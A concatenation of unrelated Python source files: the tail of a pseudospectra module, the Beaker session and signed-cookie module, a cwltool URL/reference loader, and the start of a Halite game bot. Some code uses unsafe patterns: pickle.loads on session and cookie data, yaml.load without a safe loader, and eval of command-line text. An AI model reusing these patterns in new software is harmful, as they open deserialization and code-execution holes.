[ff(x, y) for x, y in zip(args[0][3], args[0][4])])
except ImportError:
warnings.warn('Cannot import mpmath module.\
Precision of computations will be reduced to default value (15 digits).',
RuntimeWarning)
if not result:
result = (args[0][0], _calc_pseudo(*args[0][2:]))
return result
def pseudo(A, bbox=gersgorin_bounds, ppd=100, ncpu=1, digits=15):
''' calculates pseudospectra of a matrix A via classical grid method.
.. note::
It is assumed that :math:`\\varepsilon`-pseudospectra of a matrix is defined as :math:`\\sigma_{\\min}(A-\\lambda I)\\leq\\varepsion\\|A\\|`.
:param A: the input matrix as a ``numpy.array`` or 2D list with ``A.shape==(n,m)``.
:param bbox: the pseudospectra bounding box, a list of size 4 [MIN RE, MAX RE, MIN IM, MAX IM] or a function.
(default value: gersgorin_bounds - a function computes bounding box via Gershgorin circle theorem)
:param ppd: points per dimension, default is 100, i.e. total grid size is 100x100 = 10000.
:param ncpu: the number of cpu used for calculation, default is 1. If the number of cpu is greater the number of cores, it will be reduced to ncores-1.
:param digits: the number of digits used for minimal singular value computation. When digits>15, it is assumed that package mpmath is installed.
If not, default (double) precision for all calculations will be used. If mpmath is available, the minimal singular value of :math:`(A-\\lambda I)` will
be computed with full precision (up to defined value of digits), but returned singular value will be presented as np.float128.
:type A: numpy.array, 2D list of shape (n,m)
:type bbox: a list or a function returning list
:type ppd: int
:type ncpu: int
:type digits: int
:returns: numpy array of epsilon-pseudospectrum values with shape (ppd, ppd), X and Y 2D-arrays where each pseudospectra value was computed (X, Y - are created via numpy.meshgrid function).
:Example:
>>> from mpseudo import pseudo
>>> A = [[-9, 11, -21, 63, -252],
[70, -69, 141, -421, 1684],
[-575, 575, -1149, 3451, -13801],
[3891, -3891, 7782, -23345, 93365],
[1024, -1024, 2048, -6144, 24572]]
>>> psa, X, Y = pseudo(A, ncpu=3, digits=100, ppd=100, bbox=[-0.05,0.05,-0.05,0.05])
You can use contourf function from matplotlib to plot pseudospectra:
>>> from pylab import *
>>> contourf(X, Y, psa)
>>> show()
'''
n, m = np.shape(A)
assert max(n, m) > 1, 'Matricies of size 1x1 not allowed.'
if hasattr(bbox, '__iter__'):
bounds = _safe_bbox(bbox, A)
elif hasattr(bbox, '__call__'):
try:
bounds = _safe_bbox(bbox(A), A)
except:
bounds = gersgorin_bounds(A)
warnings.warn('Invalid bbox-function.\
Gershgorin circles will be used.', RuntimeWarning)
else:
bounds = gersgorin_bounds(A)
_nc = multiprocessing.cpu_count()
if not ncpu:
ncpu = 1
warnings.warn('The number of cpu-cores is not defined.\
Default (ncpu = 1) value will be used.', RuntimeWarning)
elif ncpu >= _nc and _nc > 1:
ncpu = _nc - 1
else:
ncpu = 1
x = np.linspace(bounds[0], bounds[1], ppd)
y = np.linspace(bounds[2], bounds[3], ppd)
X, Y = np.meshgrid(x, y)
yars = np.array_split(Y.ravel(), ncpu)
xars = np.array_split(X.ravel(), ncpu)
pool = multiprocessing.Pool(processes=ncpu)
results = pool.map(_pseudo_worker,
[(i, digits, A, xars[i], yars[i], n, m)
for i in range(ncpu)]
)
pool.close()
pool.join()
pseudo_res = []
for i in range(ncpu):
pseudo_res.extend(list(filter(lambda x: x[0] == i, results))[0][1])
return (np.reshape(pseudo_res, (ppd, ppd))/np.linalg.norm(A), X, Y)
if __name__ == '__main__':
A = [[-9, 11, -21, 63, -252],
[70, -69, 141, -421, 1684],
[-575, 575, -1149, 3451, -13801],
[3891, -3891, 7782, -23345, 93365],
[1024, -1024, 2048, -6144, 24572]]
psa, X, Y = pseudo(A, ncpu=None, digits=100,
ppd=100, bbox=[-0.05, 0.05, -0.05, 0.05]
)
print('Pseudospectra of the matrix A ' +
str(A) + ' was computed successfully.')
|
|
from ._compat import PY2, pickle, http_cookies, unicode_text, b64encode, b64decode
import os
import time
from datetime import datetime, timedelta
from beaker.crypto import hmac as HMAC, hmac_sha1 as SHA1, sha1
from beaker import crypto, util
from beaker.cache import clsmap
from beaker.exceptions import BeakerException, InvalidCryptoBackendError
__all__ = ['SignedCookie', 'Session']
try:
import uuid
def _session_id():
return uuid.uuid4().hex
except ImportError:
import random
if hasattr(os, 'getpid'):
getpid = os.getpid
else:
def getpid():
return ''
def _session_id():
id_str = "%f%s%f%s" % (
time.time(),
id({}),
random.random(),
getpid()
)
# NB: nothing against second parameter to b64encode, but it seems
# to be slower than simple chained replacement
if not PY2:
raw_id = b64encode(sha1(id_str.encode('ascii')).digest())
return str(raw_id.replace(b'+', b'-').replace(b'/', b'_').rstrip(b'='))
else:
raw_id = b64encode(sha1(id_str).digest())
return raw_id.replace('+', '-').replace('/', '_').rstrip('=')
class SignedCookie(http_cookies.BaseCookie):
"""Extends python cookie to give digital signature support"""
def __init__(self, secret, input=None):
self.secret = secret.encode('UTF-8')
http_cookies.BaseCookie.__init__(self, input)
def value_decode(self, val):
val = val.strip('"')
sig = HMAC.new(self.secret, val[40:].encode('utf-8'), SHA1).hexdigest()
# Avoid timing attacks
invalid_bits = 0
input_sig = val[:40]
if len(sig) != len(input_sig):
return None, val
for a, b in zip(sig, input_sig):
invalid_bits += a != b
if invalid_bits:
return None, val
else:
return val[40:], val
def value_encode(self, val):
sig = HMAC.new(self.secret, val.encode('utf-8'), SHA1).hexdigest()
return str(val), ("%s%s" % (sig, val))
class Session(dict):
"""Session object that uses container package for storage.
:param invalidate_corrupt: How to handle corrupt data when loading. When
set to True, then corrupt data will be silently
invalidated and a new session created,
otherwise invalid data will cause an exception.
:type invalidate_corrupt: bool
:param use_cookies: Whether or not cookies should be created. When set to
False, it is assumed the user will handle storing the
session on their own.
:type use_cookies: bool
:param type: What data backend type should be used to store the underlying
session data
:param key: The name the cookie should be set to.
:param timeout: How long session data is considered valid. This is used
regardless of the cookie being present or not to determine
whether session data is still valid.
:type timeout: int
:param cookie_expires: Expiration date for cookie
:param cookie_domain: Domain to use for the cookie.
:param cookie_path: Path to use for the cookie.
:param secure: Whether or not the cookie should only be sent over SSL.
:param httponly: Whether or not the cookie should only be accessible by
the browser not by JavaScript.
:param encrypt_key: The key to use for the local session encryption, if not
provided the session will not be encrypted.
:param validate_key: The key used to sign the local encrypted session
"""
def __init__(self, request, id=None, invalidate_corrupt=False,
use_cookies=True, type=None, data_dir=None,
key='beaker.session.id', timeout=None, cookie_expires=True,
cookie_domain=None, cookie_path='/', secret=None,
secure=False, namespace_class=None, httponly=False,
encrypt_key=None, validate_key=None, **namespace_args):
if not type:
if data_dir:
self.type = 'file'
else:
self.type = 'memory'
else:
self.type = type
self.namespace_class = namespace_class or clsmap[self.type]
self.namespace_args = namespace_args
self.request = request
self.data_dir = data_dir
self.key = key
self.timeout = timeout
self.use_cookies = use_cookies
self.cookie_expires = cookie_expires
# Default cookie domain/path
self._domain = cookie_domain
self._path = cookie_path
self.was_invalidated = False
self.secret = secret
self.secure = secure
self.httponly = httponly
self.encrypt_key = encrypt_key
self.validate_key = validate_key
self.id = id
self.accessed_dict = {}
self.invalidate_corrupt = invalidate_corrupt
if self.use_cookies:
cookieheader = request.get('cookie', '')
if secret:
try:
self.cookie = SignedCookie(secret, input=cookieheader)
except http_cookies.CookieError:
self.cookie = SignedCookie(secret, input=None)
else:
self.cookie = http_cookies.SimpleCookie(input=cookieheader)
if not self.id and self.key in self.cookie:
self.id = self.cookie[self.key].value
self.is_new = self.id is None
if self.is_new:
self._create_id()
self['_accessed_time'] = self['_creation_time'] = time.time()
else:
try:
self.load()
except Exception as e:
if invalidate_corrupt:
util.warn(
"Invalidating corrupt session %s; "
"error was: %s. Set invalidate_corrupt=False "
"to propagate this exception." % (self.id, e))
self.invalidate()
else:
raise
def has_key(self, name):
return name in self
def _set_cookie_values(self, expires=None):
self.cookie[self.key] = self.id
if self._domain:
self.cookie[self.key]['domain'] = self._domain
if self.secure:
self.cookie[self.key]['secure'] = True
self._set_cookie_http_only()
self.cookie[self.key]['path'] = self._path
self._set_cookie_expires(expires)
def _set_cookie_expires(self, expires):
if expires is None:
if self.cookie_expires is not True:
if self.cookie_expires is False:
expires = datetime.fromtimestamp(0x7FFFFFFF)
elif isinstance(self.cookie_expires, timedelta):
expires = datetime.utcnow() + self.cookie_expires
elif isinstance(self.cookie_expires, datetime):
expires = self.cookie_expires
else:
raise ValueError("Invalid argument for cookie_expires: %s"
% repr(self.cookie_expires))
else:
expires = None
if expires is not None:
if not self.cookie or self.key not in self.cookie:
self.cookie[self.key] = self.id
self.cookie[self.key]['expires'] = \
expires.strftime("%a, %d-%b-%Y %H:%M:%S GMT")
return expires
def _update_cookie_out(self, set_cookie=True):
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = set_cookie
def _set_cookie_http_only(self):
try:
if self.httponly:
self.cookie[self.key]['httponly'] = True
except http_cookies.CookieError as e:
if 'Invalid Attribute httponly' not in str(e):
raise
util.warn('Python 2.6+ is required to use httponly')
def _create_id(self, set_new=True):
self.id = _session_id()
if set_new:
self.is_new = True
self.last_accessed = None
if self.use_cookies:
self._set_cookie_values()
sc = set_new is False
self._update_cookie_out(set_cookie=sc)
@property
def created(self):
return self['_creation_time']
def _set_domain(self, domain):
self['_domain'] = domain
self.cookie[self.key]['domain'] = domain
self._update_cookie_out()
def _get_domain(self):
return self._domain
domain = property(_get_domain, _set_domain)
def _set_path(self, path):
self['_path'] = self._path = path
self.cookie[self.key]['path'] = path
self._update_cookie_out()
def _get_path(self):
return self._path
path = property(_get_path, _set_path)
def _encrypt_data(self, session_data=None):
"""Serialize, encipher, and base64 the session dict"""
session_data = session_data or self.copy()
if self.encrypt_key:
nonce = b64encode(os.urandom(6))[:8]
encrypt_key = crypto.generateCryptoKeys(self.encrypt_key,
self.validate_key + nonce, 1)
data = pickle.dumps(session_data, 2)
return nonce + b64encode(crypto.aesEncrypt(data, encrypt_key))
else:
data = pickle.dumps(session_data, 2)
return b64encode(data)
def _decrypt_data(self, session_data):
"""Bas64, decipher, then un-serialize the data for the session
dict"""
if self.encrypt_key:
try:
nonce = session_data[:8]
encrypt_key = crypto.generateCryptoKeys(self.encrypt_key,
self.validate_key + nonce, 1)
payload = b64decode(session_data[8:])
data = crypto.aesDecrypt(payload, encrypt_key)
except:
# As much as I hate a bare except, we get some insane errors
# here that get tossed when crypto fails, so we raise the
# 'right' exception
if self.invalidate_corrupt:
return None
else:
raise
try:
return pickle.loads(data)
except:
if self.invalidate_corrupt:
return None
else:
raise
else:
data = b64decode(session_data)
return pickle.loads(data)
def _delete_cookie(self):
self.request['set_cookie'] = True
expires = datetime.utcnow() - timedelta(365)
self._set_cookie_values(expires)
self._update_cookie_out()
def delete(self):
"""Deletes the session from the persistent storage, and sends
an expired cookie out"""
if self.use_cookies:
self._delete_cookie()
self.clear()
def invalidate(self):
"""Invalidates this session, creates a new session id, returns
to the is_new state"""
self.clear()
self.was_invalidated = True
self._create_id()
self.load()
def load(self):
"Loads the data from this session from persistent storage"
self.namespace = self.namespace_class(self.id,
data_dir=self.data_dir,
digest_filenames=False,
**self.namespace_args)
now = time.time()
if self.use_cookies:
self.request['set_cookie'] = True
self.namespace.acquire_read_lock()
timed_out = False
try:
self.clear()
try:
session_data = self.namespace['session']
if (session_data is not None and self.encrypt_key):
session_data = self._decrypt_data(session_data)
# Memcached always returns a key, its None when its not
# present
if session_data is None:
session_data = {
'_creation_time': now,
'_accessed_time': now
}
self.is_new = True
except (KeyError, TypeError):
session_data = {
'_creation_time': now,
'_accessed_time': now
}
self.is_new = True
if session_data is None or len(session_data) == 0:
session_data = {
'_creation_time': now,
'_accessed_time': now
}
self.is_new = True
if self.timeout is not None and \
now - session_data['_accessed_time'] > self.timeout:
timed_out = True
else:
# Properly set the last_accessed time, which is different
# than the *currently* _accessed_time
if self.is_new or '_accessed_time' not in session_data:
self.last_accessed = None
else:
self.last_accessed = session_data['_accessed_time']
# Update the current _accessed_time
session_data['_accessed_time'] = now
# Set the path if applicable
if '_path' in session_data:
self._path = session_data['_path']
self.update(session_data)
self.accessed_dict = session_data.copy()
finally:
self.namespace.release_read_lock()
if timed_out:
self.invalidate()
def save(self, accessed_only=False):
"""Saves the data for this session to persistent storage
If accessed_only is True, then only the original data loaded
at the beginning of the request will be saved, with the updated
last accessed time.
"""
# Look to see if its a new session that was only accessed
# Don't save it under that case
if accessed_only and self.is_new:
return None
# this session might not have a namespace yet or the session id
# might have been regenerated
if not hasattr(self, 'namespace') or self.namespace.namespace != self.id:
self.namespace = self.namespace_class(
self.id,
data_dir=self.data_dir,
digest_filenames=False,
**self.namespace_args)
self.namespace.acquire_write_lock(replace=True)
try:
if accessed_only:
data = dict(self.accessed_dict.items())
else:
data = dict(self.items())
if self.encrypt_key:
data = self._encrypt_data(data)
# Save the data
if not data and 'session' in self.namespace:
del self.namespace['session']
else:
self.namespace['session'] = data
finally:
self.namespace.release_write_lock()
if self.use_cookies and self.is_new:
self.request['set_cookie'] = True
def revert(self):
"""Revert the session to its original state from its first
access in the request"""
self.clear()
self.update(self.accessed_dict)
def regenerate_id(self):
"""
creates a new session id, retains all session data
Its a good security practice to regnerate the id after a client
elevates priviliges.
"""
self._create_id(set_new=False)
# TODO: I think both these methods should be removed. They're from
# the original mod_python code i was ripping off but they really
# have no use here.
def lock(self):
"""Locks this session against other processes/threads. This is
automatic when load/save is called.
***use with caution*** and always with a corresponding 'unlock'
inside a "finally:" block, as a stray lock typically cannot be
unlocked without shutting down the whole application.
"""
self.namespace.acquire_write_lock()
def unlock(self):
"""Unlocks this session against other processes/threads. This
is automatic when load/save is called.
***use with caution*** and always within a "finally:" block, as
a stray lock typically cannot be unlocked without shutting down
the whole application.
"""
self.namespace.release_write_lock()
class CookieSession(Session):
"""Pure cookie-based session
Options recognized when using cookie-based sessions are slightly
more restricted than general sessions.
:param key: The name the cookie should be set to.
:param timeout: How long session data is considered valid. This is used
regardless of the cookie being present or not to determine
whether session data is still valid.
:type timeout: int
:param cookie_expires: Expiration date for cookie
:param cookie_domain: Domain to use for the cookie.
:param cookie_path: Path to use for the cookie.
:param secure: Whether or not the cookie should only be sent over SSL.
:param httponly: Whether or not the cookie should only be accessible by
the browser not by JavaScript.
:param encrypt_key: The key to use for the local session encryption, if not
provided the session will not be encrypted.
:param validate_key: The key used to sign the local encrypted session
"""
def __init__(self, request, key='beaker.session.id', timeout=None,
cookie_expires=True, cookie_domain=None, cookie_path='/',
encrypt_key=None, validate_key=None, secure=False,
httponly=False, **kwargs):
if not crypto.has_aes and encrypt_key:
raise InvalidCryptoBackendError("No AES library is installed, can't generate "
"encrypted cookie-only Session.")
self.request = request
self.key = key
self.timeout = timeout
self.cookie_expires = cookie_expires
self.encrypt_key = encrypt_key
self.validate_key = validate_key
self.request['set_cookie'] = False
self.secure = secure
self.httponly = httponly
self._domain = cookie_domain
self._path = cookie_path
try:
cookieheader = request['cookie']
except KeyError:
cookieheader = ''
if validate_key is None:
raise BeakerException("No validate_key specified for Cookie only "
"Session.")
try:
self.cookie = SignedCookie(validate_key, input=cookieheader)
except http_cookies.CookieError:
self.cookie = SignedCookie(validate_key, input=None)
self['_id'] = _session_id()
self.is_new = True
# If we have a cookie, load it
if self.key in self.cookie and self.cookie[self.key].value is not None:
self.is_new = False
try:
cookie_data = self.cookie[self.key].value
self.update(self._decrypt_data(cookie_data))
self._path = self.get('_path', '/')
except:
pass
if self.timeout is not None:
now = time.time()
last_accessed_time = self.get('_accessed_time', now)
if now - last_accessed_time > self.timeout:
self.clear()
self.accessed_dict = self.copy()
self._create_cookie()
def created(self):
return self['_creation_time']
created = property(created)
def id(self):
return self['_id']
id = property(id)
def _set_domain(self, domain):
self['_domain'] = domain
self._domain = domain
def _get_domain(self):
return self._domain
domain = property(_get_domain, _set_domain)
def _set_path(self, path):
self['_path'] = self._path = path
def _get_path(self):
return self._path
path = property(_get_path, _set_path)
def save(self, accessed_only=False):
"""Saves the data for this session to persistent storage"""
if accessed_only and self.is_new:
return
if accessed_only:
self.clear()
self.update(self.accessed_dict)
self._create_cookie()
def expire(self):
"""Delete the 'expires' attribute on this Session, if any."""
self.pop('_expires', None)
def _create_cookie(self):
if '_creation_time' not in self:
self['_creation_time'] = time.time()
if '_id' not in self:
self['_id'] = _session_id()
self['_accessed_time'] = time.time()
val = self._encrypt_data()
if len(val) > 4064:
raise BeakerException("Cookie value is too long to store")
self.cookie[self.key] = val
if '_expires' in self:
expires = self['_expires']
else:
expires = None
expires = self._set_cookie_expires(expires)
if expires is not None:
self['_expires'] = expires
if '_domain' in self:
self.cookie[self.key]['domain'] = self['_domain']
elif self._domain:
self.cookie[self.key]['domain'] = self._domain
if self.secure:
self.cookie[self.key]['secure'] = True
self._set_cookie_http_only()
self.cookie[self.key]['path'] = self.get('_path', '/')
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = True
def delete(self):
"""Delete the cookie, and clear the session"""
# Send a delete cookie request
self._delete_cookie()
self.clear()
def invalidate(self):
"""Clear the contents and start a new session"""
self.clear()
self['_id'] = _session_id()
class SessionObject(object):
"""Session proxy/lazy creator
This object proxies access to the actual session object, so that in
the case that the session hasn't been used before, it will be
setup. This avoid creating and loading the session from persistent
storage unless its actually used during the request.
"""
def __init__(self, environ, **params):
self.__dict__['_params'] = params
self.__dict__['_environ'] = environ
self.__dict__['_sess'] = None
self.__dict__['_headers'] = {}
def _session(self):
"""Lazy initial creation of session object"""
if self.__dict__['_sess'] is None:
params = self.__dict__['_params']
environ = self.__dict__['_environ']
self.__dict__['_headers'] = req = {'cookie_out': None}
req['cookie'] = environ.get('HTTP_COOKIE')
if params.get('type') == 'cookie':
self.__dict__['_sess'] = CookieSession(req, **params)
else:
self.__dict__['_sess'] = Session(req, **params)
return self.__dict__['_sess']
def __getattr__(self, attr):
return getattr(self._session(), attr)
def __setattr__(self, attr, value):
setattr(self._session(), attr, value)
def __delattr__(self, name):
self._session().__delattr__(name)
def __getitem__(self, key):
return self._session()[key]
def __setitem__(self, key, value):
self._session()[key] = value
def __delitem__(self, key):
self._session().__delitem__(key)
def __repr__(self):
return self._session().__repr__()
def __iter__(self):
"""Only works for proxying to a dict"""
return iter(self._session().keys())
def __contains__(self, key):
return key in self._session()
def has_key(self, key):
return key in self._session()
def get_by_id(self, id):
"""Loads a session given a session ID"""
params = self.__dict__['_params']
session = Session({}, use_cookies=False, id=id, **params)
if session.is_new:
return None
return session
def save(self):
self.__dict__['_dirty'] = True
def delete(self):
self.__dict__['_dirty'] = True
self._session().delete()
def persist(self):
"""Persist the session to the storage
If its set to autosave, then the entire session will be saved
regardless of if save() has been called. Otherwise, just the
accessed time will be updated if save() was not called, or
the session will be saved if save() was called.
"""
if self.__dict__['_params'].get('auto'):
self._session().save()
else:
if self.__dict__.get('_dirty'):
self._session().save()
else:
self._session().save(accessed_only=True)
def dirty(self):
return self.__dict__.get('_dirty', False)
def accessed(self):
"""Returns whether or not the session has been accessed"""
return self.__dict__['_sess'] is not None
|
|
import os
import json
import hashlib
import logging
import collections
import requests
import urlparse
import yaml
import validate
log = logging.getLogger("cwltool")
class NormDict(dict):
def __init__(self, normalize=unicode):
super(NormDict, self).__init__()
self.normalize = normalize
def __getitem__(self, key):
return super(NormDict, self).__getitem__(self.normalize(key))
def __setitem__(self, key, value):
return super(NormDict, self).__setitem__(self.normalize(key), value)
def __delitem__(self, key):
return super(NormDict, self).__delitem__(self.normalize(key))
def __contains__(self, key):
return super(NormDict, self).__contains__(self.normalize(key))
def expand_url(url, base_url):
split = urlparse.urlparse(url)
if split.scheme:
return url
else:
return urlparse.urljoin(base_url, url)
class Loader(object):
def __init__(self):
normalize = lambda url: urlparse.urlsplit(url).geturl()
self.idx = NormDict(normalize)
self.url_fields = []
def resolve_ref(self, ref, base_url=None):
base_url = base_url or 'file://%s/' % os.path.abspath('.')
obj = None
# If `ref` is a dict, look for special directives.
if isinstance(ref, dict):
obj = ref
if "import" in ref:
if len(obj) == 1:
ref = obj["import"]
obj = None
else:
raise ValueError("'import' must be the only field in %s" % (str(obj)))
elif "include" in obj:
if len(obj) == 1:
ref = obj["include"]
else:
raise ValueError("'include' must be the only field in %s" % (str(obj)))
else:
if "id" in obj:
ref = obj["id"]
else:
raise ValueError("Object `%s` does not have `id` field" % obj)
if not isinstance(ref, basestring):
raise ValueError("Must be string: `%s`" % str(ref))
url = expand_url(ref, base_url)
# Has this reference been loaded already?
if url in self.idx:
return self.idx[url]
# "include" directive means load raw text
if obj and "include" in obj:
return self.fetch_text(url)
if obj:
obj["id"] = url
self.idx[url] = obj
else:
# Load structured document
doc_url, frg = urlparse.urldefrag(url)
if doc_url in self.idx:
raise validate.ValidationException("Reference `#%s` not found in file `%s`." % (frg, doc_url))
obj = self.fetch(doc_url)
# Recursively expand urls and resolve directives
self.resolve_all(obj, url)
# Requested reference should be in the index now, otherwise it's a bad reference
if self.idx.get(url) is not None:
return self.idx[url]
else:
raise RuntimeError("Reference `%s` is not in the index. Index contains:\n %s" % (url, "\n ".join(self.idx)))
def resolve_all(self, document, base_url):
if isinstance(document, list):
iterator = enumerate(document)
elif isinstance(document, dict):
inc = 'include' in document
if 'id' in document or 'import' in document or 'include' in document:
document = self.resolve_ref(document, base_url)
if inc:
return document
for d in self.url_fields:
if d in document:
if isinstance(document[d], basestring):
document[d] = expand_url(document[d], base_url)
elif isinstance(document[d], list):
document[d] = [expand_url(url, base_url) if isinstance(url, basestring) else url for url in document[d] ]
iterator = document.iteritems()
else:
return document
for key, val in iterator:
try:
document[key] = self.resolve_all(val, base_url)
except validate.ValidationException as v:
if isinstance(key, basestring):
raise validate.ValidationException("Validation error in field %s:\n%s" % (key, validate.indent(str(v))))
else:
raise validate.ValidationException("Validation error in position %i:\n%s" % (key, validate.indent(str(v))))
return document
def fetch_text(self, url):
split = urlparse.urlsplit(url)
scheme, path = split.scheme, split.path
if scheme in ['http', 'https'] and requests:
resp = requests.get(url)
try:
resp.raise_for_status()
except Exception as e:
raise RuntimeError(url, e)
return resp.text
elif scheme == 'file':
try:
with open(path) as fp:
return fp.read().decode("utf-8")
except (OSError, IOError) as e:
raise RuntimeError('Error reading %s %s' % (url, e))
else:
raise ValueError('Unsupported scheme in url: %s' % url)
def fetch(self, url):
if url in self.idx:
return self.idx[url]
try:
result = yaml.load(self.fetch_text(url))
except yaml.parser.ParserError as e:
raise validate.ValidationException("Error loading '%s' %s" % (url, str(e)))
if isinstance(result, dict):
if "id" not in result:
result["id"] = url
self.idx[expand_url(result["id"], url)] = result
else:
self.idx[url] = result
return result
def validate_links(self, document):
if isinstance(document, list):
iterator = enumerate(document)
elif isinstance(document, dict):
for d in self.url_fields:
if d in document:
if isinstance(document[d], basestring):
if document[d] not in self.idx:
raise validate.ValidationException("Invalid link `%s` in field `%s`" % (document[d], d))
elif isinstance(document[d], list):
for i in document[d]:
if isinstance(i, basestring) and i not in self.idx:
raise validate.ValidationException("Invalid link `%s` in field `%s`" % (i, d))
iterator = document.iteritems()
else:
return
try:
for key, val in iterator:
self.validate_links(val)
except validate.ValidationException as v:
if isinstance(key, basestring):
raise validate.ValidationException("At field `%s`\n%s" % (key, validate.indent(str(v))))
else:
raise validate.ValidationException("At position %s\n%s" % (key, validate.indent(str(v))))
return
POINTER_DEFAULT = object()
def resolve_json_pointer(document, pointer, default=POINTER_DEFAULT):
parts = urlparse.unquote(pointer.lstrip('/#')).split('/') \
if pointer else []
for part in parts:
if isinstance(document, collections.Sequence):
try:
part = int(part)
except ValueError:
pass
try:
document = document[part]
except:
if default != POINTER_DEFAULT:
return default
else:
raise ValueError('Unresolvable JSON pointer: %r' % pointer)
return document
loader = Loader()
|
|
import hlt
import numpy as np
import pandas as pd
from time import time
import itertools
import os
import sys
args = ' '.join(sys.argv)
if 'define' in args:
overrides = eval(args.split('define')[1].strip())
TIME_LIMIT = 1.9
nav_angles = np.array([-np.array(list(range(0, 35, 1)) + list(range(35, 120, 3))), 1+np.array(list(range(0, 35, 1)) + list(range(35, 120, 3)))]).T.flatten()
nav_rads = np.deg2rad(nav_angles)
def compute_distance_matrix(rows, cols): #warning, reverse compared to previous
B = rows
A = cols
dx = A.x.values[None] - B.x.values[:, None]
dy = A.y.values[None] - B.y.values[:, None]
return np.sqrt(np.square(dx) + np.square(dy))
def ccw(A,B,C):
return (C.y-A.y) * (B.x-A.x) > (B.y-A.y) * (C.x-A.x)
# Return true if line segments AB and CD intersect
def intersect(A,B,C,D):
return ccw(A,C,D) != ccw(B,C,D) and ccw(A,B,C) != ccw(A,B,D)
def intersect_segment_circle(start, ex, ey, circle, *, fudge=1.0):
sx = start.x
sy = start.y
worker_radius = start.radius
cx = circle.x
cy = circle.y
cr = circle.radius + worker_radius + fudge
dx = ex - sx
dy = ey - sy
a = dx ** 2 + dy ** 2
b = (sx ** 2 + sy ** 2 - sx * cx - sy * cy + ex * (cx - sx) + ey * (cy - sy))
t = np.clip(b / (a + 1e-8), 0.0, 1.0)
closest_x = sx + dx * t
closest_y = sy + dy * t
closest_distance = (closest_x - cx) ** 2 + (closest_y - cy) ** 2
return (closest_distance <= cr ** 2)
from collections import namedtuple
class Squad:
def __init__(self, member_ids, accuracy=0.85, scale=1.25, fudge=0.15):
self.accuracy = accuracy
self.r = scale
self.fudge = fudge
self.member_ids = member_ids
self.formation = scale * pd.DataFrame(np.array([
[np.cos(np.deg2rad(30)) - np.sqrt(1 / 3), np.sin(np.deg2rad(30))],
[-np.sqrt(1 / 3), 0],
[np.cos(np.deg2rad(-30)) - np.sqrt(1 / 3), np.sin(np.deg2rad(-30))]
]))
self.radius = scale * np.sqrt(1/3) + hlt.constants.SHIP_RADIUS # FIXME
def move(self, bot, x, y):
v = np.array([x, y])
orig = bot.ships.loc[self.member_ids][['x', 'y']].copy()
disp = orig.mean() - orig
target = namedtuple('pos', 'x y radius')(*v, 0.5)
worker = namedtuple('pos', 'x y radius')(*orig.mean().values, self.radius)
v = v - orig.mean()
dist_target = np.sqrt(v.dot(v)) - 3.8
try:
theta = bot.find_clear_rads(target, worker, min(20.0, dist_target))[0]
except:
theta = np.arctan2(*(v / np.sqrt(v.dot(v)))[::-1])
# if bot.turn_count < 2:
# theta = 1.0
# dist_target = 0.01
#
# if hasattr(self, 'theta') and bot.turn_count >= 2:
# dtheta = (theta - self.theta) % (2*np.pi)
# theta = self.theta + np.clip(dtheta, -0.5, 0.5)
self.theta = theta
# assert len(self.member_ids) == 3
# R = np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])
beta = 0.0
R = np.array([[np.cos(beta), -np.sin(beta)], [np.sin(beta), np.cos(beta)]])
# ordering = [2,1,0]
# self.ordering = ordering
formation = self.formation.copy()
formation = formation.iloc[:len(self.member_ids)]
formation = formation - formation.mean() # assumes we want it centered
formation = formation.dot(R.T)
formation.columns = ['x', 'y']
# if not hasattr(self, 'ordering'):
# d = compute_distance_matrix(formation, disp)
#
# perms = np.array(list(itertools.permutations(range(len(formation)))))
# def nonintersect(ordering):
# startpoints = orig.iloc[ordering]
# endpoints = orig.iloc[ordering] + disp.iloc[ordering] + formation.values
# return not (intersect(startpoints.iloc[ordering[0]], endpoints.iloc[ordering[0]], startpoints.iloc[ordering[1]], endpoints.iloc[ordering[1]]) or
# intersect(startpoints.iloc[ordering[2]], endpoints.iloc[ordering[2]], startpoints.iloc[ordering[1]], endpoints.iloc[ordering[1]]) or
# intersect(startpoints.iloc[ordering[0]], endpoints.iloc[ordering[0]], startpoints.iloc[ordering[2]], endpoints.iloc[ordering[2]]))
# ordering = perms[np.argmin([d[list(p)].trace() for p in perms if nonintersect(p)])]
# self.ordering = ordering
# else:
# ordering = self.ordering
#
# ordering = [o for o in ordering if o <len(self.member_ids)]
#
# disp = disp.iloc[ordering]
# orig = orig.iloc[ordering]
found = False
# direction = (v / np.sqrt(v.dot(v)))
direction = np.array([np.cos(theta), np.sin(theta)])
for vshift in np.transpose(direction[:, None] * np.linspace(min(8.5, dist_target), 2, 100)):
dd = disp + formation.values + vshift
intthrust = np.round(dd.apply(np.linalg.norm, axis=1, raw=True)).astype(int)
if intthrust.max() > 7:
continue
intangle = np.round(np.rad2deg(dd.apply(lambda x: np.arctan2(*x[::-1]), axis=1, raw=True))).astype(int)
shift = np.transpose([intthrust.values * np.cos(np.deg2rad(intangle.values)),
intthrust.values * np.sin(np.deg2rad(intangle.values))])
if len(self.member_ids)>1:
if compute_distance_matrix((orig + shift), (orig + shift)).flat[[1, 2, 5][:len(self.member_ids)]].min() <= 2 * 0.5 + self.fudge:
continue
if True or ((orig + shift).reset_index(drop=True).corrwith(formation)).min() >= self.accuracy: #FIXME
found = True
intangle = intangle % 360
break
if found:
command_queue = [('t', *x) for x in zip(orig.index, intthrust, intangle)]
return [' '.join(str(x) for x in command) for command in command_queue]
else:
return []
class Bot:
def __init__(self, game, **overrides):
self.game = game
self.map = game.map
self.my_id = self.map.my_id
self.num_players = len(self.map.all_players())
# Tunable target penalties (I need to fit these...)
self.DOCKABLE_PLANET_PENALTY = 0.0 # except this should probably stay zero
# self.MAX_COLLISION_DISTANCE = 7*13
self.MAX_COLLISION_DISTANCE = 14
self.THREAT_CUTOFF = 30
self.DEFENDER_DISTANCE = 3.0
if self.num_players == 2:
self.ENEMY_SHIP_PENALTY = -20.0 #-40
self.LOW_HP_ENEMY_SHIP_PENALTY = -5.0
self.D_CENTER_PENALTY = 0.01
self.DEFENSE_PENALTY = -45.0
else:
self.ENEMY_SHIP_PENALTY = -10.0 # or a function of player strength in current frame? maybe should be positive for 4p?
self.LOW_HP_ENEMY_SHIP_PENALTY = -5.0
self.D_CENTER_PENALTY = -1 / 3 # minus one unit penalty for three units distance from center
self.DEFENSE_PENALTY = -45.0
self.__dict__.update(**overrides)
self.ships = pd.DataFrame(columns=['docked', 'enemy', 'health', 'x', 'y', 'dx', 'dy', 'dhealth'])
self.turn_count = 0
